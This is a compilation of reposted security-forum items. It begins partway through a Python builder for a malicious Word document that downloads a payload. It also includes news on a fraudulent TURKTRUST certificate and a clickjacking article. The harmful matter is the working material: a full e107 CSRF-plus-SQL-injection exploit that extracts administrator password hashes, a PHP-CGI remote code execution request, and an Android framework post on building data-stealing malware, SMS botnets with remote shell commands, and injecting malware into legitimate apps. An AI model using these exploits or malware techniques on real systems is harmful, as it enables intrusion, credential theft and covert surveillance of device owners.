"\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31\x36\x31" "\x36\x31\x7D\x7D\x7D\x7D" ) url="" ul = open("URL.txt",'rb') sr = ul.read() for i in range(0,len(sr)): a = ord(sr[i]) url += "%02x" % a url +="\x30"*2 payload = header + url + footer file = open("Laden.doc",'wb') file.write(header + url + footer) file.close() os.rename("Laden.doc",st) URL.txt contains the actual URL from where one has to download calc. This URL.txt file should be in the same folder where the creator file will be. You can also embed the direct text string of the URL in the creator file. One more point: reversing the exploit sample will vary from exploit to exploit. It’s not that while reversing another sample you will always apply the same process, but in 80% of the cases, it’s what I explain above. Sursa: InfoSec Institute Resources – Reversing a Malicious Word Document

[h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM

[h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected a "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.yo utube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are effected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly effect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi Ýletiþim ve Biliþim Güvenliði Hizmetleri A.Þ. © Aralýk 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist

Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly. A. What a browser exploit kit is, and what it isn't It only does exploits Directing victims to the exploits is out of scope Usually done with spam or iframe injections The actual malware installed is out of scope too Where is exploit kit is hosted, is also quite variable B. Timeline Version 1.0.0 - September 2010 i. It's not that different from other exploit kits Version 1.0.1 Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011 Version 1.1.0 - December 2010 i. Changelog Version 1.2.0 - August 2011 i. Changelog Version 1.2.1 - December 2011 Version 1.2.2 i. Cryptome "Virus" Version 1.2.3 - March 2012 Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110 Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm' August 2012 i. CVE-2012-4681 Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true. C. The "Free Version" Pulled from a system with C99 Shell IonCube "copy protection" How to break IonCube obfuscation Analysis of PHP Source Code D. Open Source Code in use PluginDetect MaxMind GeoIP etc. E. The Exploits CVE-2010-0188 etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit

Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using BeEF Browser Exploitation Framework and Java Payload Module. In BeEF Framework there is one module available called Java Payload in local exploits we are going to use that module and exploiting the windows -7 system. So, first you need to hook the browser and use that module victim will get the Java Pop-up if he click on OK you will get the meterpreter shell in some time Note for getting session it will take some time so be patient. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation

[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Sursa: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia

Stiam ca e un macro, dar nu stiam cum e definit si dupa mici cautari: WinBase.h #define ZeroMemory RtlZeroMemory RtlZeroMemory e definit in WDH.h: #define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) Aparent e acelasi lucru. E probabil insa sa fie mici diferente la apel, "memset" probabil va apela wrapper-ul din runtime-ul de la Visual C iar apelul ZeroMemory e posibil sa fie executat direct in kernel (RtlZeroMemory routine (Windows Drivers)). O sa fac putin research sa vad.

[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 31.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 185.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 109.7 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 408.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 285.1 MB High Quality WMV (PC, Xbox, MCE) [h=3]File size[/h] 507.7 MB format < > embed + queue In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session. We cover these commands: !address -summary !address <addr> !vprot <addr> !mapped_file <addr> Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals VMMap Performance and Memory Consumption Under WOW64 MEMORY_BASIC_INFORMATION structure Memory Protection Constants Timeline: [00:50] - Live Debug of Notepad [01:10] - VMMap of Notepad [02:08] - Virtual Address Space summary (!address -summary) [04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB [08:11] - Memory Mapped Files [10:11] - Memory Type, State and Protection (inc. Guard Pages) [21:22] - Allocation Base vs. Base Address (!address <addr>) [26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>) [29:14] - Mapped Files (!mapped_file <addr>) Sursa: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9

NFC - NEAR FIELD COMMUNICATION Subho Halder and Aditya Gupta ........................................................ INTRODUCTION Near Field Communication at glance. What is NFC ? NFC or Near Field Communication is a set of standards or protocols to communicate between two devices by either touching or bringing into close proximity ( less than 4 cm ). The communicating protocols of such devices are based on RFID Standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded on 2004 by some major companies such as Sony, Nokia, Philips, Samsung etc. The operating Frequency of such communication is merely 13.56 MHz ( +/- 7 ) which is very low. This gives an advantage of easily integrating into portable devices without the need of much battery power. Download: www.exploit-db.com/download_pdf/23826

[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h] MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection. Vulnerable code: /editpost.php === Line 398 === $posthash_query = "posthash='{$posthash}' OR "; === It can be done by using Tamper Data(Or Live HTTP Headers), and when submitting a post, edit the 'posthash' POST parameter to your payload, submitting, then going to edit your post. Small "HOWTO" in picture: http://imgur.com/a/JxfEI This bug was not found by me, but afaik, I am the first one to release it. -- *Joshua Rogers* - Retro Game Collector && IT Security Specialist gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> Sursa: MyBB (editpost.php, posthash) SQL Injection Vulnerability

[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h] # Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection # Google Dork: intext:"This site is powered by e107" # Date: 01/01/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://e107.org # Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download # Version: 1.0.2 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2012-6434 ----------------------------------------------------------------------------------------- Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download. ------------------------------------------------------------------------------------------ Exploit: <html> <body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form> </body> </html> ------------------------------------------------------------------------------------------ Fix: This bug has been fixed in the following revision: r13058 ------------------------------------------------------------------------------------------ Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family. Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast Sursa: e107 v1.0.2 CSRF Resulting in SQL Injection

WiFi Password Decryptor [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information [/TD] [/TR] [TR] [TD] WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in clear text [/TD] [/TR] [TR] [TD=align: justify]After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password. Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms. New version 1.5 supports command-line version making it useful for automation & penetration testers. It has been successfully tested on Windows Vista and higher operating systems including Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Features & Benefits [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Instantly decrypt and recover stored WiFi account passwords Recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) Command-line version for automation & penetration testers. Simple & elegant GUI interface makes it easy to use. Right click context menu to quickly copy the Password Sort feature to arrange the displayed passwords Save the recovered WiFi password list to HTML/XML/TEXT file. Integrated Installer for assisting you in local Installation & Uninstallation. [/TD] [/TR] [/TABLE] Details: http://securityxploded.com/wifi-password-decryptor.php Download: http://securityxploded.com/download.php#wifipassworddecryptor

[h=1]Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823[/h]by infodox The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up for several reasons. Primarily the massive misunderstanding of how it worked. For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguements into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution. Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell PHP.ini that it is to allow URL inclusion ( allow_url_include = 1 ), and to automatically prepend the “file” php://input. This means whatever we send in the POST request is parsed as PHP, and executed. One way to exploit this (targetting example.com), using the lwp-request’s “POST” utility, is as follows. echo “<?php system(‘id’);die(); ?>” | POST “http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input” As you will see in the video, we can easily use this to execute commands remotely from a BASH shell. The HTTP request sent, looks something similar to this: POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: example.com User-Agent: lwp-request/6.03 libwww-perl/6.04 Content-Length: 29 Content-Type: application/x-www-form-urlencoded <?php system(‘id’);die(); ?> he response to that was the server sending back the result of our command (id), so we know it works. So now we have a somewhat reliable “commandline” RCE method, however, we like to automate things… Let’s see how hard it is to write a reliable exploit in Python. The following screenshot shows exploitation using Python. Exploiting PHP-CGI bug with Python So, we know now that using Python’s requests library (a mainstay of all my exploits, as I guess you noticed). Now that we have reliable exploitation using Python, I decided to go a step further and write an actual exploit in Python to automate the whole thing. It simply drops you into a shell of sorts, giving you the ability to run commands as the web-user. Exploit code available here: Google Code – Insecurety Research So, along comes the demo, as usual in video format. This time, with additional tunes by Blackmail House who gave me permission to use their music in demo videos the other day in the pub Remember, play nice out there. Sursa: Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823 | Insecurety Research

Hack Android With Android Exploitation Framework IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You would also come to see, how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting other persons computer/mobile devices with a malicious application without his permission is an punishable crime. Their exist a lot of tools to exploit the security holes in normal PC environment, but there have been really less tools for the Android environment, which at the same time is expandable. By expandable, i’m trying to say, that the users who use the framework, could build there own modules and share with the security community. Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application based and platform based vulnerabilities, as well as write plugins for the framework and share it with the community. Subho Halder and me (Aditya Gupta) have developed a framework known as Android Framework for Exploitation, which we released in BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community to analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users. One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares in existing legitimate applications. This is just to show that how ineffective our current mobile anti malwares are against these type of infected version of legitimate applications, as at the time of writing, none of the anti malwares for Android detected the malware sample. Some of the features which we’ll be looking into this post is : 1. Creating a malware 2. Creating a botnet 3. Injecting malicious codes in a legitimate application 4. Analyzing vulnerable applications Before we go further, let us have a look at the file structure of AFE. Once you download AFE, you will be having a structure similar to the one given below. The Input will be containing all the input apk(s) for any processing, such as crypting the apk to make it undetectable from anti malwares, or inserting the apk in any other legitimate apk or so on. Creating a malware AFE gives the users to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want. To create a malware, first of all you have to launch AFE by typing in ./afe. To get help at any point of time, just type in ? and hit enter. Note : This tool is made natively for *nix based systems. If you’re running Windows, you could use it by installing Cygwin. Also make sure you’ve all the dependencies such as Python and the android sdk installed. Once you are inside menu, type in run [the module name] to execute a particular module. In this case, the module is named malware. Once you type in run malware Just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you’ll have the option of Stealer. There are 3-predefined stealers, and you can add more yourself. The 3 already existing ones include – • Call Logs • Contacts • Messages Here’s a video of it. Creating a Botnet To create a botnet, you have to launch AFE as mentioned earlier. and go on to create a botnet, similar to as we did in the last demo. Once you’ve created and installed the botnet in any android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won’t be able to know if any kind of malicious activity is being performed. Some of the sms based commands are : toast: To display a particular message on the screen infect: To spread the botnet to any other device by sending a sms from already infected device browse : automatically open a URL on the victim’s phone shell : The most useful command. Could be used to execute any shell based commands. For example, xysec shell cat /proc/version Note: All the commands should be appended with the keyword ‘xysec’ - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been send as a command won’t be displayed in the notification of the victim. Analyzing Application for Leaking Content Providers One of the most important components of Android applications while working with application data is Content Providers. To get the content providers of the application, you could either reverse the application manually, or look for the content providers, or you could use tool such as Apktool, and parse information based on the filter of content:// To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder. Once we select the application, it will automatically present us with the list of content providers present in the application. After finding out the permission of the content providers, and if it is set as exported without any permission checking, the application is vulnerable to leaking content providers vulnerability. To make a POC of this vulnerability, we could use the content provider (vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made: We are accessing the Vulnerable application’s data using its content provider. Uri.parse("> We would in further update the Github repo located at https://github.com/xysec/AFE/ to make POCs automatically. Injecting malicious codes in legitimate application Using AFE, you could inject malicious codes in legitimate applications. This is to demonstrate how easy it is for malware authors to create infected version of the legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications. To create the application: Select the malware to be injected, Choose the target apk Type inject Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly create application with our key. The newly created file will be stored in /Output as the name of [originalapp].apk and [originalapp]_signed.apk. Creating Plugins for AFE AFE is an extendable framework, which could be integrated with user made plugins. To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin name. Let us take an example of a plugin named as DB Stealer. This plugin, grabs all the database files (.db) from the device or emulator, and saves it on the system. The code for this plugin has been written in PHP. There are 3 necessary files : Run.sh dbstealer.php dbstealer.info Run.sh is the initializing code, which will load up the entire code (written in any language, in this case php), and will execute it. The second file, dbstealer.php is the main code of the plugin. It is loaded from run.sh with the code php dbstealer.php. The third file dbstealer.info will contain the information about the plugin, which will be displayed when the user will type in info dbstealer from the afe prompt. Hope you guys enjoyed the post. Feel free to mail us at security@xysec.com for any bug issues/suggestions/trainings/ideas! Sursa: Hack Android With Android Exploitation Framework | Learn How To Hack - Ethical Hacking and security tips

